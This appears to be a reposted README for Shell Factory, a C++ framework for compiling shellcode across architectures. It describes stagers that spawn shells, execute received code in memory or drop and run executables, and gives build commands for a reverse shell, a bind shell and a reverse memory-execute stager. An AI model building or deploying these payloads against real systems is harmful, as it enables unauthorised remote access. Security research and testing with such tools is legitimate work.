Shell Factory is a framework for compiling shellcodes from a C++ source for multiple systems and architectures.
It is composed of multiple parts:
a Rakefile for compiling and linking against different compilers and architectures.
the factory, a set of C++ headers to generate system calls for different systems and architectures.
picolib, a generic C++ library relying on the system call factory to abstract interactions the target system.
The shellcode is compiled as a single compilation unit with common optimizations to reduce its code size.
The resulting file is supposed to be a single binary blob executable from anywhere in memory, starting at offset 0.
Requirements
Rake
Linux
binutils
g++ or clang++
OS X
Xcode command-line tools
Basic usage
Put your shellcode source file in the shellcodes directory, then compile it with rake <shellcode>.
For example, create a template file named shellcodes/template.cc :
#include <factory.h>
#include <pico.h>
using namespace Pico;
SHELLCODE_ENTRY {
Process::exit(0);
}
Then compile it with: rake template. On a Linux amd64 system, this will generate the files bins/template.elf and bins/template.x86_64-linux.bin.
$ objdump -d bins/template.elf
00000000004000b0 <_start>:
4000b0: 31 ff xor %edi,%edi
4000b2: b8 e7 00 00 00 mov $0xe7,%eax
4000b7: 0f 05 syscall
Default shellcodes
Three generic stager shellcodes are provided in the shellcodes directory:
shellexec : runs a standard /bin/sh shell or any specified command.
memexec : allocates executable memory, receives data and executes it.
dropexec : reads data, drops an executable file on the system and executes it.
Channels
Channels are an abstraction layer that allows to use different kind of data streams configurable through compilation variables: files, sockets, opened file descriptors.
They are typically used by shellexec, memexec and dropexec to receive and send data. The default channels used are the standard input/output when none are specified.
Examples
Reverse shell on the local network
rake shellexec CHANNEL=TCP_CONNECT HOST=192.168.0.2 PORT=2222
Bind-shell TCPv6
rake shellexec CHANNEL=TCP6_LISTEN HOST=::1 PORT=1111
Reverse memory execute over SCTPv6
rake memexec CHANNEL=SCTP6_CONNECT HOST=fe80::800:27ff:fe00:0 PORT=3333
Supported targets
x86 amd64 ARM Aarch24 PowerPC SH4 MIPS
Linux ✓ ✓ ✓ ✓ ✓ ✓ ∼
FreeBSD ✓ ∼
OS X ∼
Items marked as ∼ are a work in progress and are not fully implemented yet.
Download
0 comments :